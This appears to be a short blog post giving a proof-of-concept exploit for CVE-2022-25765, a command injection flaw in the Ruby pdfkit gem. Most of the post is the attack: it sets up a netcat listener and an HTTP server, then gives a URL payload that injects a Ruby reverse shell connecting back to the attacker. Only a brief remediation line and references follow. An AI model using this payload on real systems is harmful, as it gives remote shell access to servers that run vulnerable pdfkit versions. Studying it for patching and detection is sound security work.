Home CVE-2022-25765 pdfkit
Post
Cancel

CVE-2022-25765 pdfkit

Posted Oct 8, 2022 Updated Jun 6, 2023
source (https://www.bio-logical-it.com/).
source (https://www.bio-logical-it.com/).
By D_C4ptain
1 min read

pdfkit-Exploit-Reverse-Shell

All < 0.8.6 versions of this package are vulnerable to Command Injection where the URL is not properly sanitized.

Severity

Critical 9.8/10

Note

This issue was originally addressed in 0.8.7, but the fix was not complete. A complete fix was released in 0.8.7.2.

Pre-requisites setup

HTTP Server
  • python3 -m http.server 9090
Netcat Listener
  • nc -lvnp 4444

Reverse Ruby shell

1

http://LOCAL-IP:9090/?name=%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LOCAL-IP",4444))'`

How to fix?

Upgrade pdfkit to version 0.8.7.2 or higher.

Reference

https://nvd.nist.gov/vuln/detail/CVE-2022-25765

https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

CVE
shell rce pdfkit poc cve d_captain D_C4ptain
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

SheHacksKE KCA Intervarsity CTF — 2022 Write up

Rootme  -  TryHackMe Writeup